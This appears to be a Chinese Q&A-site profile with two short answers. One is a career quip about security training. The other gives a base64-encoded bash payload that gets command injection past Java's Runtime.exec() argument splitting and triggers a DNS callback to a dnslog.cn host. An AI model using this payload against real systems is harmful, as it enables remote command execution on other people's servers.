2 个回答
0 赞同
Runtime.exec(),对执行的dnslog回显whoami没有解析,直接带出来...
他会分割成数组破坏参数,编码一下就好了payload:bash -c {echo,bnNsb29rdXAgMTIzLmRuc2xvZy5jbg==}|{base64,-d}|{bash,-i}
回答于 2022-07-14 14:03
2 赞同
挖洞白帽子、CTFer、培训讲师、安全研究员,你最想从事哪项工作...
那必然是培训讲师啊,每个月培训十天,平均一天5K,纯五万,剩下的自由时间想干嘛干嘛,不香吗!
回答于 2021-06-15 11:47